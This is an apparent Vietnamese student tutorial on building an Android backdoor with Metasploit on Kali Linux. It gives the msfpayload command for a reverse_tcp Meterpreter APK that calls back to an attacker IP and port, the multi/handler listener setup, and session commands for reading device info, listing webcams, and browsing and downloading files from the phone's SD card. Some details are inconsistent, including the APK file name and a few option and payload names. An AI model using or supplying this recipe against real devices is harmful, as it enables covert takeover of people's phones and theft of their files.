Lê Trân Xuân Lanh- Lơp CNTT – Sang 2,4,6

Tạo mã độc trên KALI LINUX để thâm nhập android

Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử dụng máy ảo Kali Linux bằng Vmware, ta nên thiết lập phần Network như sau:

chọn vào Network Adapter và chọn Bridged: connection directly to the physical network

phần Bridge (connect VMs directly to the external network) chọn adapter của máy thật

Đầu tiên mở terminal và gõ dòng lệnh

ifconfig để xem thông số về IP của máy

sau đó gõ lệnh

Msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104 lport=8080 R > /root/Desktop/files.apk

lệnh trên sẽ tạo ra 1 file binh.apk và sẽ được lưu ở đường dẫn root/Desktop/

LHOST -ta ghi vào địa chỉ IP của máy, LPORT-8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng (well knowm port : 0 -> 1023).

tiếp theo gõ lệnh msfconsole:

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ lệnh sau:

use exploit/multi/handler

set payload /meterpreter/reverse_tcp

set lhost 192.168.0.104 – nhập địa chỉ IP giống với khi tạo payload ở trên.

set port 8080 – nhập port giống với port khi tạo payload ở trên.

Exploit

Sau đó chúng ta đợi cho android cài đặt ứng dụng binh.apk vào máy ảo và đợi khi thiết bị android đã kích hoạt

khi xuất hiện thêm dòng lệnh này thì đã thành công

giao diện ứng dụng của android:

để xem thông tin về máy gõ :sysinfo

để xem thông tin về camera gõ: webcam_list

để truy cập vào thẻ nhớ của điện thoại gõ : cd /sdcard sau đó ls máy sẽ hiển thị các folder có trong điện thoại

vd :khi bạn muốn vào tập tin Alarms để download những gì bên trong thì bạn gõ

-cd /sdcard/Alarms

-ls(nó sẽ hiển thị tất cả các thư mục bên trong)

-download tenfile

sau đó sẽ tự động download về máy tính